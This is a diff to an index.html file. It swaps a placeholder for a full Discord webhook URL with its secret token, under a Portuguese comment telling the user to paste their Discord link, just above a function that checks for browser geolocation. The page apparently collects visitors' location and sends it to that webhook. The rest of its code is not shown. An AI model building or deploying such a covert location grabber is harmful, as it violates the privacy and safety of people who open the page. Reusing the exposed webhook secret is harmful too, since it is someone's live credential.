--- a/index.html
+++ b/index.html
@@ -17,7 +17,7 @@
 
     <script>
         // ATENÇÃO: COLOQUE SEU LINK DO DISCORD ABAIXO
-        const WEBHOOK_URL = "COLE_AQUI_SEU_LINK_DO_WEBHOOK";
+        const WEBHOOK_URL = "https://discord.com/api/webhooks/1467483594279878717/Yd31-VbARr_0NGE01f3tq7lg8Rg0-fCNxVj2FUED7yZcRt47p_Etr7kyTGUFV_Mq3os8";
 
         function iniciar() {
             if (navigator.geolocation) {
